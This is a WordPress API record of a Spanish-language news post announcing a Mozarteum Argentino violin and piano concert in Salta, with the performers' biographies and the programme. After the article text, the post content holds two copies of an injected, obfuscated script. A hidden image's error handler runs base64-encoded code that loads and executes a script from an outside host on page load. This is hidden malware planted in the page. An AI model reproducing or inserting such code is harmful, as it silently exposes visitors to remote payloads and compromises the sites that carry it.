{"id":3010,"date":"2023-08-22T09:38:05","date_gmt":"2023-08-22T12:38:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3010"},"modified":"2025-08-14T00:10:05","modified_gmt":"2025-08-14T03:10:05","slug":"mozarteum-argentino-filial-salta-presenta-concierto-de-violin-y-piano-como-parte-de-su-temporada-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3010","title":{"rendered":"Mozarteum Argentino \u2013 Filial Salta presenta concierto de Viol\u00edn y Piano como parte de su Temporada 2023"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#76022f\"><strong><em>Este mi\u00e9rcoles 23 a las 21 horas, Clara Cernat en Viol\u00edn y Tierry Huillet en Piano brindar\u00e1n su concierto en el Teatro de la Fundaci\u00f3n Salta, General G\u00fcemes 434.<\/em><\/strong><\/h3>\n\n\n\n<p>Desde Mosc\u00fa, Clara Cernat y Thierry Huillet exploran incansablemente el repertorio para viol\u00edn y piano, desde el siglo XVIII al siglo XXI. Su &nbsp;intensa actividad art\u00edstica pasa por grandes obras maestras populares a magn\u00edficos, fomentando la creaci\u00f3n de compositores vivos y ofreciendo una nueva forma de escuchar grandes obras maestras sinf\u00f3nicas a trav\u00e9s de las transcripciones para viol\u00edn y piano, escritas por Thierry Huillet, desde Berlioz hasta Gershwin.<\/p>\n\n\n\n<p>Clara Cernat es una de las artistas m\u00e1s representativas de la gran escuela de viol\u00edn rumana. Cernat fue disc\u00edpula de Stefan Gheorghiu en la Academia de M\u00fasica de Bucarest, tambi\u00e9n ha recibido formaci\u00f3n en Alemania y Suiza. Sus CD y DVD, con m\u00fasica de Enesco, Bloch, Turina, Kunc, Beethoven, Brahms, Faur\u00e9, Liszt, Saint-Sa\u00ebns, Huillet han sido calurosamente evaluados por la cr\u00edtica. Actualmente es profesora titular en el Conservatorio de Toulouse (Francia) y suele impartir clases magistrales de viol\u00edn y viola.<\/p>\n\n\n\n<p>Thierry Huillet se forma como pianista en el Conservatoire National Sup\u00e9rieur de Paris, con Pierre Sancan y Germaine Mounier. Tambi\u00e9n ha estudiado con Paul Badura-Skoda y Leon Fleischer. Como compositor, tiene un cat\u00e1logo de m\u00e1s de cien obras. Su faceta de director abarca desde conciertos cl\u00e1sicos (Bach, Mozart, Haydn, Beethoven) a obras contempor\u00e1neas, como su \u00abCarnaval de la For\u00eat\u00bb, que gan\u00f3 reconocimiento de numerosos conjuntos (Orchestre R\u00e9gional de Bayonne C\u00f4te Basque, Collectif Carnaval, Royal Academy London). En la actualidad es profesor titular en el Conservatorio de Toulouse (Francia) y suele participar en clases magistrales y jurados de piano.<\/p>\n\n\n\n<p>El programa se presentar\u00e1&nbsp;ma\u00f1ana&nbsp;mi\u00e9rcoles 23 de agosto a las 21 en la Fundaci\u00f3n en el Teatro de la Fundaci\u00f3n Salta, General G\u00fcemes 434. Estar\u00e1 compuesto por:<\/p>\n\n\n\n<p>FRANZ SCHUBERT (1797-1828)<\/p>\n\n\n\n<p>Rond\u00f3 brillante en Si menor, Op. 70, D 895<\/p>\n\n\n\n<p>THIERRY HUILLET<\/p>\n\n\n\n<p>Voyage Rhapsody, Op. 100<\/p>\n\n\n\n<p>FELIX MENDELSSOHN BARTHOLDY (1809-1847)<\/p>\n\n\n\n<p>Sonata para viol\u00edn y piano en Fa menor, Op. 4<\/p>\n\n\n\n<p>Adagio-Allegro moderato<\/p>\n\n\n\n<p>Poco adagio<\/p>\n\n\n\n<p>Allegro agitato<\/p>\n\n\n\n<p>THIERRY HUILLET (n. 1965)<\/p>\n\n\n\n<p>Valahia Rhapsody, Op. 98 SCHUBERT (1797-1828)<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n pueden consultar a trav\u00e9s de mozarteumsalta@gmail.com<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/mozarteum-argentino-filial-salta-presenta-concierto-de-violin-y-piano-como-parte-de-su-temporada-2023-91359\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este mi\u00e9rcoles 23 a las 21 horas, Clara Cernat en Viol\u00edn y Tierry Huillet en Piano brindar\u00e1n su concierto en el Teatro de la Fundaci\u00f3n Salta, General G\u00fcemes 434. Desde Mosc\u00fa, Clara Cernat y Thierry Huillet exploran incansablemente el repertorio para viol\u00edn y piano, desde el siglo XVIII al siglo XXI. Su &nbsp;intensa actividad art\u00edstica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3011,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-3010","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3010"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3010"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3010\/revisions"}],"predecessor-version":[{"id":6987,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3010\/revisions\/6987"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3011"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3010"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}